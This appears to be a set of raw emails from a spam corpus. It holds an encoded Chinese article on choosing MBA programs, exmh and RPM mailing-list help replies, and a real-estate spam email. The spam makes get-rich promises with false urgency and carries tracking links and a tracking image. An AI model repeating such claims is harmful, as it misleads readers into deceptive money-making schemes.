 =D7=D4=BC=BA=B5=C4=D1=DB=BE=A6=C8=CF=D5=E6=C9=B8=D1=A1=A1=A3=D4=DA=D0=C2=D2=BB=
 =C4=EA=B6=C8MBA=D5=D0=BF=BC=BC=BE=BD=DA=B5=BD=C0=B4=D6=AE=BC=CA=A3=AC=CE=DE=C2=
 =DB=D5=D0=C9=FA=BC=F2=D5=C2=BA=CD=D5=D0=C9=FA=C8=CB=D4=B1=B5=C4=D1=D4=B4=C7=C8=
 =E7=BA=CE=BB=AA=C0=F6=A1=A2=C8=E7=BA=CE=CE=FC=D2=FD=A3=AC=BD=A8=D2=E9=B1=A8=BF=
 =BC=D5=DF=CF=C8=D2=AA=B4=D3=D2=D4=CF=C2=BC=B8=B8=F6=B7=BD=C3=E6=C8=A5=C8=CF=D5=
 =E6=BA=E2=C1=BF=A3=AC=D2=D4=D1=A1=D4=F1=B8=FC=CE=AA=BF=C9=D0=C5=B5=C4MBA=BD=CC=
 =D3=FD=A3=BA     =B5=DA=D2=BB=A3=AC=D1=A7=D0=A3MBA=B5=C4=BD=CC=D3=FD=CA=B5=C1=
 =A6=D3=EB=C9=E7=BB=E1=B5=D8=CE=BB=CA=C7=BA=E2=C1=BF=D2=BB=B8=F6=B8=DF=D0=A3=
 MBA=BD=CC=D3=FD=BA=C3=BB=B5=B5=C4=D6=D8=D2=AA=B1=EA=D7=BC=D6=AE=D2=BB=A1=A3=D5=
 =E2=CC=E5=CF=D6=D4=DA=A3=BA     1=A3=A9=C8=A8=CD=FE=BB=FA=B9=B9=C8=CF=BF=C9   =
   =D4=DA=C3=C0=B9=FA=A3=AC=D3=D0=D2=BB=B8=F6=D7=A8=C3=C5=C6=C0=B9=C0=C9=CC=D1=
 =A7=D4=BA=B5=C4=C8=A8=CD=FE=BB=FA=B9=B9AACSB=B9=FA=BC=CA=B9=DC=C0=ED=BD=CC=D3=
 =FD=D0=AD=BB=E1=A3=AC=C6=E4=C6=C0=B9=C0=B7=B6=CE=A7=CF=D6=D4=DA=D2=D1=C0=A9=B4=
 =F3=B5=BD=CA=C0=BD=E7=B7=B6=CE=A7=A3=AC=B1=BB=C6=E4=C8=CF=BF=C9=B5=C4=C9=CC=D1=
 =A7=D4=BA=B6=BC=CA=C7=BF=C9=D2=D4=D0=C5=C0=B5=B5=C4=A1=A3=B1=A8=BF=BC=D5=DF=CD=
 =B6=BF=BC=C7=B0=A3=AC=BF=C9=D2=D4=CF=C8=B5=BD=CB=FC=B5=C4=CD=F8=D5=BE=
 www.aacsb.edu.=C8=A5=B2=E9=D1=AF=A1=A3 =D4=DA=D6=D0=B9=FA=A3=AC=BD=F8=D0=D0=C6=
 =C0=B9=C0=B5=C4=D7=EE=B8=DF=C8=A8=CD=FE=BB=FA=B9=B9=CA=C7=B9=FA=CE=F1=D4=BA=D1=
 =A7=CE=BB=CE=AF=D4=B1=BB=E1=BC=B0=C6=E4=C1=EC=B5=BC=CF=C2=B5=C4=C8=AB=B9=FA=B9=
 =A4=C9=CC=B9=DC=C0=ED=CB=B6=CA=BF=A3=A8MBA=A3=A9=BD=CC=D3=FD=D6=B8=B5=BC=CE=AF=
 =D4=B1=BB=E1=A1=A3=BD=D8=D6=B92001=C4=EA=A3=AC=B1=BB=B9=FA=CE=F1=D4=BA=D1=A7=
 =CE=BB=B0=EC=C5=FA=D7=BC=B5=C4MBA=BD=CC=D3=FD=CA=D4=B5=E3=D4=BA=D0=A3=B4=EF=B5=
 =BD62=CB=F9=A1=A3=C6=E4=D6=D0=D6=BB=D3=D0=BC=AB=C9=D9=CA=FD=B5=C4=BE=B3=C4=DA=
 =CD=E2=BA=CF=D7=F7=CF=EE=C4=BF=A3=AC=B0=E4=B7=A2=BE=B3=CD=E2=B5=C4=B2=A2=B5=C3=
 =B5=BD=B9=FA=BC=D2=C8=CF=BF=C9=B5=C4MBA=D1=A7=CE=BB=A3=AC=C8=E7=B1=B1=B4=F3=D3=
 =EB=C3=C0=B9=FA=B5=C4=B8=A3=CC=B9=C4=AA=B4=F3=D1=A7=BA=CF=D7=F7=B5=C4=B9=FA=BC=
 =CAMBA=A3=AC=BE=CD=B0=E4=B7=A2=B8=A3=CC=B9=C4=AA=B5=C4MBA=D1=A7=CE=BB=A1=A3=B6=
 =F8=C6=E4=CB=FB=BE=F8=B4=F3=B6=E0=CA=FD=CD=AC=BE=B3=CD=E2MBA=BA=CF=D7=F7=B5=C4=
 =CF=EE=C4=BF=A3=AC=C8=D4=CA=C7=B7=A2=B9=FA=C4=DA=B5=C4=D1=A7=CE=BB=D6=A4=CA=E9=
 =A3=AC=BE=B3=CD=E2=C9=CC=D1=A7=D4=BA=D6=BB=B7=A2=D2=BB=D6=BD=C3=BB=D3=D0=CA=B5=
 =BC=CA=D2=E2=D2=E5=B5=C4=C8=CF=D6=A4=A1=A3     2=A3=A9=CA=A6=D7=CA=C1=A6=C1=BF=
 =BC=B0=BD=E1=B9=B9     MBA=BD=CC=CA=A6=B5=C4=B1=B3=BE=B0=D6=B1=BD=D3=D3=B0=CF=
 =EC=BD=CC=D1=A7=D6=CA=C1=BF=A1=A3=BF=BC=B2=EC=BD=CC=CA=A6=B5=C4=CA=B5=C1=A6=BF=
 =C9=B8=F9=BE=DD=C8=FD=B7=BD=C3=E6=A3=BA     A,=CA=A6=D7=CA=B5=C4=D7=DC=CC=E5=
 =C7=E9=BF=F6=A1=A3=C8=E7=BD=CC=CA=A6=B5=C4=D6=AA=C3=FB=B6=C8=A3=AC=BD=CC=CA=DA=
 =A1=A2=B2=A9=CA=BF=CB=F9=D5=BC=B1=C8=C0=FD=B5=C8=A1=A3     B,=BD=CC=CA=A6=B5=
 =C4=D1=A7=C0=FA=C0=B4=D4=B4=A1=A3=C8=E7=CB=FB=C3=C7=B5=C4=D1=A7=CE=BB=CA=C7=CA=
 =B2=C3=B4=B5=B5=B4=CE=B5=C4=D1=A7=D0=A3=CA=DA=D3=E8=B5=C4=A1=A3=B9=FA=BC=CA=D6=
 =F8=C3=FB=B4=F3=D1=A7=D3=EB=D2=BB=B0=E3=B4=F3=D1=A7=B5=C4=C7=F8=B1=F0=CA=C7=B2=
 =BB=D1=D4=B6=F8=D3=F7=B5=C4=A3=AC=C3=C0=B9=FA=A1=A2=C5=B7=D6=DE=A1=A2=B0=C4=D6=
 =DE=B5=C4=D2=BB=D0=A9=BA=C3=D1=A7=D0=A3=D2=F2=C6=E4=CC=E5=D6=C6=B2=BB=CD=AC=D2=
 =B2=D3=D0=B2=EE=B1=F0=A1=A3     C, =BD=CC=CA=A6=B5=C4=CA=B5=D5=BD=BE=AD=D1=E9=
 =A1=A3MBA=BD=CC=D3=FD=CA=C7=D2=BB=B8=F6=CA=B5=BC=F9=D0=D4=BA=DC=C7=BF=B5=C4=BD=
 =CC=D3=FD=A3=AC=BD=CC=CA=A6=D3=EB=BC=E6=D6=B0=BD=CC=CA=A6=B5=C4=BE=AD=C0=FA=C8=
 =E7=BA=CE=A3=AC=C8=E7=CA=C7=B7=F1=B5=A3=C8=CE=B9=FD=C6=F3=D2=B5=B5=C4=B9=CB=CE=
 =CA=A3=AC=CA=C7=B7=F1=D3=D0=B9=FD=CA=B5=BC=CA=B9=A4=D7=F7=BE=AD=D1=E9=B5=C8=A3=
 =AC=B6=D4=D1=A7=C9=FA=B6=BC=D3=D0=D7=C5=C7=B1=D2=C6=C4=AC=BB=AF=B5=C4=D7=F7=D3=
 =C3=A1=A3     3=A3=A9=D1=A7=D0=A3=B5=C4=C0=FA=CA=B7=D4=A8=D4=B4=A1=A2=D4=DA=B5=
 =B1=B5=D8=BC=B0=C8=AB=B9=FA=A1=A2=C4=CB=D6=C1=CA=C0=BD=E7=B5=C4=C9=E7=BB=E1=D3=
 =B0=CF=EC=A1=A3     =C3=C0=B9=FA=B5=C4=B3=A3=C7=E0=CC=D9=D1=A7=D0=A3=C3=FB=C9=
 =F9=D4=DA=CD=E2=A3=AC=C0=FA=CA=B7=D3=C6=BE=C3=A1=A2=CE=C4=BB=AF=D4=CC=BA=AD=B7=
 =E1=B8=BB=A1=A3=CB=FB=C3=C7=B5=C4=D0=A3=D3=D1=CD=F9=CD=F9=D4=DA=C9=CC=BD=E7=B5=
 =A3=C8=CE=B8=DF=BC=B6=D6=B0=CE=F1=A3=AC=D4=B8=D2=E2=D5=D0=C6=B8=B1=BE=D0=A3=B1=
 =CF=D2=B5=C9=FA=A1=A3=D2=F2=B4=CB=A3=AC=B8=C3=D0=A3=B1=CF=D2=B5=C9=FA=CD=F9=CD=
 =F9=CA=C7=B4=F3=B9=AB=CB=BE=A1=A2=CD=B6=D7=CA=D2=F8=D0=D0=A1=A2=B1=A3=CF=D5=B9=
 =AB=CB=BE=A1=A2=D7=C9=D1=AF=B9=CB=CE=CA=B9=AB=CB=BE=D5=F9=CF=C8=D5=D0=C6=B8=B5=
 =C4=B6=D4=CF=F3=A3=AC=B2=BB=C9=D9=C8=CB=BF=C9=D2=D4=CD=AC=CA=B1=BD=D3=B5=BD=
 3-6=BC=D2=B9=AB=CB=BE=B5=C4=C6=B8=CA=E9=A1=A3=D5=E2=D0=A9=C9=CC=D1=A7=D4=BA=B5=
 =C4MBA=D1=A7=CE=BB=CA=C7=D2=BB=CC=F5=CD=A8=CF=F2=B8=DF=D0=BD=BD=D7=B2=E3=B5=C4=
 =B1=A3=D6=A4=A3=AC=B1=CF=D2=B5=C9=FA=B5=C4=C4=EA=D0=BD=D2=BB=B0=E3=D4=DA=
 6-15=CD=F2=C3=C0=BD=F0=D6=AE=BC=E4=A1=A3=C3=C0=B9=FA=B5=C4=B3=A3=C7=E0=CC=D9=
 =D1=A7=D0=A3=D2=B2=D3=C9=B4=CB=B3=C9=CE=AA=CA=C0=BD=E7=C9=CF=CB=F9=D3=D0=D3=C5=
 =D0=E3=D1=A7=C9=FA=BC=B0=B8=BB=BA=C0=BC=D2=D7=E5=D7=D3=B5=DC=CF=F2=CD=F9=B5=C4=
 =B6=C1=CA=E9=B5=D8=B7=BD=A1=A3     =CD=AC=D1=F9=A3=AC=D4=DA=D6=D0=B9=FA=A3=AC=
 =D2=BB=D0=A9=C0=FA=CA=B7=D3=C6=BE=C3=B5=C4=C3=FB=C5=C6=D1=A7=D0=A3=D2=B2=D4=DA=
 =C9=E7=BB=E1=C9=CF=BE=DF=D3=D0=BD=CF=B8=DF=B5=C4=D3=B0=CF=EC=C1=A6=A3=AC=B1=C8=
 =C8=E7=C7=E5=BB=AA=B4=F3=D1=A7=A1=A2=B1=B1=BE=A9=B4=F3=D1=A7=D1=A7=B5=C8=A3=AC=
 =D5=E2=D0=A9=D1=A7=D0=A3=B5=C4=B1=CF=D2=B5=C9=FA=C6=D5=B1=E9=CA=DC=B5=BD=C9=E7=
 =BB=E1=B5=C4=BB=B6=D3=AD=A3=AC=CB=FB=C3=C7=B5=C4=BA=DC=B6=E0=D0=A3=D3=D1=D4=DA=
 =D5=FE=B8=AE=BC=B0=C6=F3=D2=B5=C0=EF=B5=A3=C8=CE=D6=D8=D2=AA=B5=C4=D6=B0=CE=F1=
 =A1=A3=B5=B1=C8=BB=A3=AC=CB=FC=C3=C7=B0=ECMBA=B5=C4=C6=F0=B5=E3=B1=C8=D2=BB=B0=
 =E3=B5=C4=B8=DF=D0=A3=D2=B2=D2=AA=B8=DF=A1=A3=D1=A1=D4=F1=D5=E2=D0=A9=B8=DF=D0=
 =A3=B5=C4MBA=BE=CD=B6=C1=CE=DE=D2=C9=B6=D4=BD=F1=BA=F3=BE=CD=D2=B5=BA=CD=BB=F1=
 =C8=A1=B8=DF=D0=BD=D6=B0=CE=BB=CA=C7=CF=E0=B5=B1=D6=D8=D2=AA=B5=C4=A1=A3     =
 =B5=DA=B6=FE=A3=ACMBA=BD=CC=D3=FD=B5=C4=BF=CE=B3=CC=C9=E8=D6=C3=D3=EB=D7=A8=D2=
 =B5=B7=BD=CF=F2=CA=C7=B7=F1=C1=E9=BB=EE=B6=E0=D1=F9=BB=AF=A3=AC=CA=C7=B7=F1=CA=
 =CA=D3=A6=B5=B1=BD=F1=D0=C2=BE=AD=BC=C3=CA=B1=B4=FA=B5=C4=B7=A2=D5=B9 =A3=BB  =
    =CB=E6=D7=C5=D3=C3=C8=CB=BB=FA=B9=B9=B5=C4=D4=BD=C0=B4=D4=BD=D7=A8=D2=B5=BB=
 =AF=A3=AC=BC=BC=CA=F5=B8=FC=D0=C2=D6=DC=C6=DA=B5=C4=D4=BD=C0=B4=D4=BD=B6=CC=A3=
 =AC=B2=BB=C1=CB=BD=E2=D0=D0=D2=B5=B5=C4=B7=A2=D5=B9=B7=BD=CF=F2=D6=BB=D6=AA=B5=
 =C0=B9=DC=C0=ED=B5=C4=BF=F2=BC=DC=CA=C7=CE=DE=BC=C3=D3=DA=CA=C2=B5=C4=A1=A3=D4=
 =DA=D6=D0=B9=FA=A3=AC=BD=F6=BD=F6=CB=B5=CA=C7=B9=FA=BC=CAMBA=BB=F2=B9=FA=BC=CA=
 =BA=CF=D7=F7MBA=A3=AC=BD=F6=BD=F6=CA=C7=CD=E2=D3=EF=C4=DC=C1=A6=C7=BF=A3=AC=B6=
 =F8=C3=BB=D3=D0=D6=F7=B9=A5=B7=BD=CF=F2=A3=AC=C3=BB=D3=D0=D7=A8=D2=B5=BC=BC=CA=
 =F5=CC=D8=B3=A4=A3=AC=CA=C7=D4=B6=D4=B6=B2=BB=C4=DC=C2=FA=D7=E3=CA=D0=B3=A1=D0=
 =E8=C7=F3=B5=C4=A1=A3=D2=F2=B4=CB=A3=ACMBA=BD=CC=D3=FD=B5=C4=BF=CE=B3=CC=C9=E8=
 =D6=C3=BA=CD=D7=A8=D2=B5=B7=BD=CF=F2=CA=C7=B7=C7=B3=A3=D6=D8=D2=AA=B5=C4=A1=A3=
 =C4=BF=C7=B0=A3=AC=B8=F7=B8=F6=D4=BA=D0=A3MBA=BD=CC=D3=FD=B5=C4=B1=D8=D0=DE=BB=
 =F2=BA=CB=D0=C4=BF=CE=B3=CC=BB=F9=B1=BE=C9=CF=B4=F3=CD=AC=D0=A1=D2=EC=A3=AC=B5=
 =AB=CA=C7=D4=DA=D1=A1=D0=DE=BF=CE=D3=EB=BF=AA=C9=E8=D7=A8=D2=B5=B7=BD=CF=F2=C9=
 =CF=C8=B4=BF=C9=C4=DC=B2=EE=B1=F0=BA=DC=B4=F3=A1=A3=D2=BB=D0=A9=CA=B5=C1=A6=D0=
 =DB=BA=F1=B5=C4=D4=BA=D0=A3=CE=AA=C1=CB=CA=CA=D3=A6=B5=B1=BD=F1=CA=D0=B3=A1=B6=
 =D4=D2=BB=D0=A9=C8=C8=C3=C5=D7=A8=D2=B5=B5=C4=C7=BF=C1=D2=D0=E8=C7=F3=A3=AC=BF=
 =AA=C9=E8=C1=CB=D0=ED=B6=E0=D0=C2=D0=CD=BF=CE=B3=CC=B2=A2=C9=E8=D6=C3=C1=CB=D6=
 =F7=B9=A5=D7=A8=D2=B5=A3=AC=BB=F2=CC=E1=B9=A9=CB=AB=D1=A7=CE=BB=B9=A5=B6=C1=A1=
 =A3     =D4=DA=C3=C0=B9=FA=A3=AC=D3=D0=BC=B8=B0=D9=C4=EA=C0=FA=CA=B7=B5=C4=C2=
 =DE=B8=F1=CB=B9=B4=F3=D1=A7=C9=CC=D1=A7=D4=BA=BE=CD=CE=AAMBA=BF=AA=C9=E8=C1=CB=
 =BC=B8=B8=F6=B6=C0=CC=D8=B5=C4=D7=A8=D2=B5=A3=AC=C8=E7=D2=D5=CA=F5=B9=DC=C0=ED=
 =A1=A2=B5=E7=D7=D3=C9=CC=CE=F1=A1=A2=C9=FA=CE=EF=D6=C6=D2=A9=B9=DC=C0=ED=A1=A2=
 =B9=A9=D3=A6=C1=B4=B9=DC=C0=ED=A1=A2=C8=CB=C1=A6=D7=CA=D4=B4=B9=DC=C0=ED=A1=A2=
 =C6=F3=D2=B5=BC=D2=B5=C8=A3=BB=C1=ED=CD=E2=BB=B9=C9=E8=D3=D0=CB=AB=D1=A7=CE=BB=
 =A3=AC=C8=E7MBA/J.D.(=B7=A8=D1=A7)=A1=A2 MBA/MD(=D2=BD=D1=A7=B2=A9=CA=BF)=A1=
 =A2 MBA/MPH(=B9=AB=B9=B2=BD=A1=BF=B5=CB=B6=CA=BF)=A1=A2MBA/B.S.=A3=A8=D1=A7=CA=
 =BF=D6=B1=C9=FD=A3=A9=A1=A3=C3=C0=B9=FA=C1=ED=D2=BB=B8=F6=B3=A3=C7=E0=CC=D9=D1=
 =A7=D0=A3=B1=F6=CF=A6=B7=A8=C4=E1=D1=C7=B4=F3=D1=A7=CE=D6=B6=D9=C9=CC=D1=A7=D4=
 =BA=D2=B2=C9=E8=C1=A2=D3=D0=BC=B8=B8=F6=D0=C2=D7=A8=D2=B5=A3=AC=C8=E7=BC=BC=CA=
 =F5=B4=B4=D0=C2=A1=A2=B1=A3=CF=D5=D3=EB=B7=E7=CF=D5=B9=DC=C0=ED=A1=A2=B2=BB=B6=
 =AF=B2=FA=B9=DC=C0=ED=B5=C8=B5=C8=A3=AC=CD=AC=CA=B1=BB=B9=BF=AA=C9=E8=C1=CB=
 200=B6=E0=C3=C5=D1=A1=D0=DE=BF=CE=B9=A9=D1=A7=C9=FA=D1=A1=D4=F1=A1=A3=D5=E2=D0=
 =A9=D1=A7=D0=A3=B5=C4MBA=BD=CC=D3=FD=B7=C7=B3=A3=D3=AD=BA=CF=C9=E7=BB=E1=D0=E8=
 =C7=F3=A3=AC=D1=A7=C9=FA=B1=CF=D2=B5=BA=F3=BA=DC=BF=EC=BE=CD=C4=DC=D4=DA=B8=DA=
 =CE=BB=C9=CF=D5=D2=B5=BD=D3=C3=CE=E4=D6=AE=B5=D8=A1=A3     =D4=DA=D6=D0=B9=FA=
 =A3=AC=D2=B2=D3=D0=D2=BB=D0=A9=CA=B5=C1=A6=D0=DB=BA=F1=B5=C4=D4=BA=D0=A3=BF=AA=
 =C9=E8=C1=CB=D6=F7=B9=A5=D7=A8=D2=B5=BC=B0=B7=E1=B8=BB=B5=C4=BF=CE=B3=CC=A1=A3=
    =B5=DA=C8=FD=A3=AC=D1=A7=D0=A3=CA=C7=B7=F1=CE=AA=BE=AD=BC=C3=BB=EE=D4=BE=B5=
 =C4=B5=D8=C7=F8=A1=A2=CA=C7=B7=F1=CE=AA=C9=CC=D2=B5=A1=A2=BD=F0=C8=DA=A1=A2=C3=
 =B3=D2=D7=D6=D0=D0=C4=A1=A2=CA=C7=B7=F1=CD=AC=B9=FA=BC=CA=CA=D0=B3=A1=BD=D3=B9=
 =EC =A3=BB        
 --de3568c4-65bc-11d6-b6fa-0050ba415022--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: defaulting to showing plaintext versions of e-mails
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Sat, 24 Aug 2002, "Harlan" == Harlan Feinstein wrote:
   Harlan&gt; What's the trick again to have it default to showing
   Harlan&gt; text/plain instead of html?
 In ~/.exmh/exmh-defaults add:
 *mime_alternative_prefs: text/plain text/enriched text/richtext text/html
 Order possible alternatives from _your_ most preferred to least
 preferred.
 --Hal
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Learn the Secrets of Investing in Real Estate Today!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --__________MIMEboundary__________
 Content-Type: text/plain
 Content-Transfer-Encoding: quoted-printable
 X-MIME-Autoconverted: from 8bit to quoted-printable by hq.pro-ns.net id g6MKYVhX096488
 Dear Friend,=20
 Do you need extra money? Are you in debt? Stuck in a dead end job, or jus=
 t
 want to work for yourself?
 How would you like to earn up to $100 per hour investing in real estate?
 You can! I will teach you my secrets to building a fortune with real
 estate!=20
 =95 No Experience Necessary
 =95 Work full or part time
 =95 Use almost none of your own money
 =95 Good or bad credit, it doesn't matter
 Anyone can do this; this system is so easy you won't believe it! This
 once-in-a-lifetime deal is going to expire fast . . . take the next five
 minutes to make changes for the better that will last a lifetime.
 Your Friend and Personal Mentor,
 http://r.vresp.com/?A/f920a9a9ef
 Lou Vukas=20
 =20
 http://r.vresp.com/?A/b8e02b156b
 =20
 ______________________________________________________________________
 You are receiving this email because you requested to receive info and
 updates via email.
 To unsubscribe, reply to this email with "unsubscribe" in the subject or
 simply click on the following link:
 http://unsubscribe.verticalresponse.com/u.html?96a0aef8be/aa3b97bcc2
 --__________MIMEboundary__________
 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 X-MIME-Autoconverted: from 8bit to quoted-printable by hq.pro-ns.net id g6MKYVhX096488
 &lt;html&gt;  &lt;head&gt; &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.=
 0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt; &lt;meta
 http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-1252"=
 &gt;
 &lt;title&gt;Real Estate Fortunes&lt;/title&gt; &lt;/head&gt; &lt;img
 src=3D'http://ad.iwin.com/tmpad/banner/actiontrack.asp?io=3D---&amp;rs=3D' he=
 ight=3D1
 width=3D1 border=3D0&gt;  &lt;body&gt;   &lt;table borderColor=3D"#6699cc" cellSpacin=
 g=3D"0"
 cellPadding=3D"0" width=3D"500" align=3D"center" border=3D"0"&gt;   &lt;tr&gt;    =
  &lt;td
 vAlign=3D"bottom" align=3D"left"&gt;     &lt;a
 href=3D"http://r.vresp.com/?A/5472c1f421"&gt;     &lt;img
 src=3D"http://www.realestatefortunes.com/logo.gif" border=3D"0" width=3D"=
 159"
 height=3D"60"&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td vAlign=3D"bottom" align=3D"left"&gt;     &lt;a
 href=3D"http://r.vresp.com/?A/7b51433cee"&gt;     &lt;img
 src=3D"http://www.realestatefortunes.com/pics.gif" border=3D"0" width=3D"=
 373"
 height=3D"47"&gt;&lt;/a&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;     &lt;td vAlign=3D"top"
 bgColor=3D"#6699cc" height=3D"533"&gt;     &lt;table cellSpacing=3D"0" cellPadd=
 ing=3D"0"
 width=3D"100%" bgColor=3D"#6699cc" border=3D"0"&gt;       &lt;tr&gt;         &lt;td
 vAlign=3D"top" align=3D"middle"&gt;&lt;br&gt;         &lt;a
 href=3D"http://r.vresp.com/?A/368b56677b"&gt;         &lt;img
 src=3D"http://www.realestatefortunes.com/testim.gif" border=3D"0" width=3D=
 "144"
 height=3D"32"&gt;&lt;/a&gt;&lt;br&gt;         &lt;br&gt;         &lt;a
 href=3D"http://r.vresp.com/?A/a3a57aa100"&gt;         &lt;img
 src=3D"http://www.realestatefortunes.com/guyandcar.gif" vspace=3D"3"
 border=3D"0" width=3D"137" height=3D"93"&gt;&lt;/a&gt;&lt;br&gt;         &lt;font face=3D"A=
 rial,
 Helvetica, sans-serif" color=3D"#99ffff" size=3D"-2"&gt;         Here's me o=
 n a
 recent &lt;br&gt;         vacation in Las Vegas. &lt;/font&gt;         &lt;p&gt;       =20
 &lt;img src=3D"hrule.gif" width=3D"109" height=3D"2"&gt;&lt;/p&gt;         &lt;p&gt;&lt;a
 href=3D"http://r.vresp.com/?A/ac403a0ebb"&gt;         &lt;img
 src=3D"http://www.realestatefortunes.com/specialoffer.gif" border=3D"0"
 width=3D"146" height=3D"143"&gt;&lt;/a&gt;&lt;/p&gt;         &lt;p&gt;=A0&lt;/td&gt;       &lt;/tr&gt;   =20
 &lt;/table&gt;     &lt;/td&gt;     &lt;td vAlign=3D"top" align=3D"right" height=3D"533"&gt;=
 &lt;br&gt;
 =A0&lt;table cellSpacing=3D"0" cellPadding=3D"0" width=3D"88%" border=3D"0"&gt;=
        &lt;tr&gt;
         &lt;td height=3D"139"&gt;&lt;a href=3D"http://r.vresp.com/?A/e40c384063"&gt; =
     =20
   &lt;img src=3D"http://www.realestatefortunes.com/header.gif" border=3D"0"
 width=3D"312" height=3D"129"&gt;&lt;/a&gt;&lt;br&gt; =A0&lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;    =
    =20
 &lt;td vAlign=3D"top" align=3D"left" height=3D"422"&gt;         &lt;font face=3D"A=
 rial,
 Helvetica, sans-serif" color=3D"#006699" size=3D"-1"&gt;Dear          Friend=
 ,
 &lt;br&gt;         &lt;br&gt;         Do you need extra money? Are you in debt? Stuck
 in a dead end job, or          just want to work for yourself?&lt;br&gt;       =
 =20
 &lt;br&gt;         How would you like to &lt;b&gt;earn up to $100 per hour investing
 in real          estate&lt;/b&gt;? You can! I will teach you my secrets to
 building a fortune          with real estate! &lt;br&gt;         &lt;br&gt;       =20
 &lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" color=3D"#006699"&gt;&lt;b&gt;=95=
  No =20
        Experience Necessary&lt;br&gt;         =95 Work full or part time&lt;br&gt;   =
   =20
   =95 Use almost none of your own money&lt;br&gt;         =95 Good or bad credi=
 t, it
 doesn't matter&lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"
 color=3D"#006699" size=3D"-1"&gt;&lt;br&gt;         &lt;br&gt;         Anyone can do thi=
 s;
 this system is so easy you won't believe it! This        =20
 once-in-a-lifetime deal is going to expire fast . . . take the next five =
 =20
        minutes to make changes for the better that will last a
 lifetime.&lt;/font&gt;&lt;p align=3D"center"&gt;         &lt;a
 href=3D"http://r.vresp.com/?A/aa0b82cfcf"&gt;         &lt;img
 src=3D"http://www.realestatefortunes.com/clickhere.gif" border=3D"0"
 width=3D"141" height=3D"44"&gt;&lt;/a&gt;&lt;/p&gt;         &lt;p align=3D"center"&gt;        =
  &lt;font
 face=3D"Arial, Helvetica, sans-serif" color=3D"#006699" size=3D"-1"&gt;Your =
       =20
  Friend and Personal Mentor,&lt;/font&gt;&lt;br&gt;         &lt;img
 src=3D"http://www.realestatefortunes.com/signature.gif" width=3D"105"
 height=3D"46"&gt; &lt;br&gt;         &lt;font face=3D"Arial, Helvetica, sans-serif"
 color=3D"#006699" size=3D"-1"&gt;Lou          Vukas &lt;/font&gt;&lt;/td&gt;       &lt;/tr&gt;=
    =20
 &lt;/table&gt;     &lt;/td&gt;   &lt;/tr&gt; &lt;/table&gt;  &lt;/body&gt;  &lt;/html&gt;
 &lt;br&gt;
                      &lt;hr color=3De0e0e0&gt;
                      &lt;table border=3D0 cellpadding=3D5 cellspacing=3D0
 width=3D100%&gt;
                      &lt;tr&gt;
                            &lt;td&gt;&lt;font face=3D"arial,verdana" size=3D1&gt;You =
 are
 receiving this email because you requested to receive info and updates vi=
 a
 email.
 To unsubscribe, reply to this email with "unsubscribe" in the subject or
 simply click on the following link: &lt;a
 href=3D"http://unsubscribe.verticalresponse.com/u.html?96a0aef8be/aa3b97b=
 cc2"&gt;Unsubscribe&lt;/a&gt;&lt;/td&gt;
                      &lt;/tr&gt;
                      &lt;/table&gt;
 &lt;img src=3Dhttp://i.verticalresponse.com/blank.gif?96a0aef8be/aa3b97bcc2&gt;
 --__________MIMEboundary__________--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</si>
  <si>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On Fri, 2002-08-16 at 04:28, Angles Puglisi wrote:
 &gt; Any sage advice on the most painless way to upgrade from old limbo (.92) to new
 &gt; limbo (.93)?
 Format and reinstall. There is no supported upgrade path from beta to
 beta, or from beta to release.
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_2112058634P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Scott Lipcon &lt;slipcon@mercea.net&gt;
 &gt; Date:  Mon, 23 Sep 2002 10:54:19 -0400
 &gt;
 &gt; Oops - turns out i wasn't careful installing it, so the exmh(library)
 &gt; variable was pointing at my old installation.  I'm surprised it worked
 &gt; as well as it did.
 &gt; 
 &gt; In any case, I removed the old library directory, and edited exmh,
 &gt; exmh-bg, exmh-strip, etc to point at the right one.  Now I'm getting
 &gt; another traceback on startup:
 &gt; 
 &gt; can't read "mhPriv(pubseq,family,cur)": no such variable
 &gt;     while executing
 &gt; "MhSeq $folder $seq add $mhPriv(pubseq,$folder,$seq) [MhSeqExpand
 &gt; $folder $msgids"
 &gt;     (procedure "MhReadSeqs" line 73)
 &gt;     invoked from within
 &gt; "MhReadSeqs $folder seqs"
 &gt;     (procedure "Mh_Sequences" line 2)
 &gt;     invoked from within
 &gt; "Mh_Sequences $folder"
 &gt;     (procedure "Flist_UnseenUpdate" line 4)
 &gt;     invoked from within
 &gt; "Flist_UnseenUpdate $folder"
 &gt;     (procedure "FolderChange" line 51)
 &gt;     invoked from within
 &gt; "FolderChange family {Msg_Show cur}"
 &gt;     invoked from within
 &gt; "time [list  FolderChange $folder $msgShowProc"
 &gt;     (procedure "Folder_Change" line 3)
 &gt;     invoked from within
 &gt; "Folder_Change $exmh(folder)"
 &gt;     (procedure "Exmh" line 101)
 &gt;     invoked from within
 &gt; "Exmh"
 &gt;     ("after" script)
 &gt; 
 &gt; 
 &gt; +family is the folder I was in when I quit exmh.
 That shouldn't have been able to happen, but I've just made the code slightly 
 more bullet proof.
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_2112058634P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
